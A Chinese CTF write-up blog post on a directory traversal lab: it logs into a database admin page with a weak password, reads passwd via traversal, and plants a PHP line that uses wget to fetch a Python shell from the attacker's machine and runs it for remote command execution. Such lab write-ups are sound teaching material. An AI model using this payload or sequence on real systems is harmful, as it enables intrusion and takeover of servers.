CTF-目录遍历漏洞

本文介绍了如何通过发现并利用网站的目录遍历漏洞,逐步进行权限提升,最终实现Webshell上传和远程命令执行。涉及步骤包括弱口令攻击、漏洞确认、内容获取、数据库操作与脚本部署、简易HTTP服务器搭建和权限获取的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原理:当客户端访问到一个目录时,Apache服务器将会默认寻找一个index list中的文件,若文 件不存在,则会列出当前目录下所有文件或返回403状态码,而列出目录下所有文件的行为称为目录遍历。

1.扫描,看到个很admin有关的页面

2.老规矩试一下弱口令admin,进入成功,是个数据库后台管理页面 

3.使用AWVS扫描网站,有个目录遍历漏洞,根据漏洞详情在地址栏输入地址得到passwd的内容,说明这个漏洞可行

 3.这样就可以上传webshell,用目录遍历的方式启动。用msfvenom生成一个基于Python的webshell

4.在数据库后台新建一个数据库,创建一个表,并设置元组为1个

 

5.设置元组类型为txt,值为<?php system("cd /tmp;wget http://192.168.203.130:8000/shell.py;chmod 777 shell.py;python shell.py");?>,当访问数据库的时候系统会自动读取改值,并执行命令,相当于一个脚本

6.利用python建立简单http服务器

 

 7.复制路径,访问并取得权限

 

 

 

 

 

 

 

 

 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Reaches_r

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值